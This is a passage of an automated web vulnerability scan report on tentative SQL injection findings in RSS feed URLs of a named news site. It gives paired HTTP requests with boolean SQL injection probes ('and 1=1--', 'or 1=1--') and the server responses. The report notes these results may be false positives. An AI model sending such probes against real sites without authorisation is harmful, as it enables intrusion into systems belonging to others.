</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/200923.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:36 GMT
Content-Length: 0
Connection: close


1.92. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200924.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200924.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 48401163'%20or%201%3d1--%20 and 48401163'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet48401163'%20or%201%3d1--%20/568/200924.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:18 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet48401163'%20or%201%3d2--%20/568/200924.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:18 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.93. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200925.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200925.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/568%20and%201%3d1--%20/200925.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:16 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/568%20and%201%3d2--%20/200925.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:16 GMT
Content-Length: 0
Connection: close


1.94. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200927.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200927.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/200927.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:22 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/200927.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:26 GMT
Content-Length: 0
Connection: close


1.95. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200929.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200929.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/200929.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:32 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/200929.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:32 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.96. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200930.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200930.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200930.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:03 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200930.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:22:03 GMT
Date: Tue, 07 Dec 2010 23:22:03 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>


1.97. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200934.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200934.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200934.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:22:15 GMT
Date: Tue, 07 Dec 2010 23:22:15 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>

Request 2

GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200934.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:16 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.98. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200935.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200935.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 12838428'%20or%201%3d1--%20 and 12838428'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi12838428'%20or%201%3d1--%20/rss/CustomRssServlet/568/200935.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:57 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi12838428'%20or%201%3d2--%20/rss/CustomRssServlet/568/200935.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:21:57 GMT
Date: Tue, 07 Dec 2010 23:21:57 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>


1.99. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200935.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200935.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 13599438%20or%201%3d1--%20 and 13599438%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56813599438%20or%201%3d1--%20/200935.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:10 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet/56813599438%20or%201%3d2--%20/200935.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:10 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.100. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200936.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200936.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/200936.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:35 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/200936.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:35 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
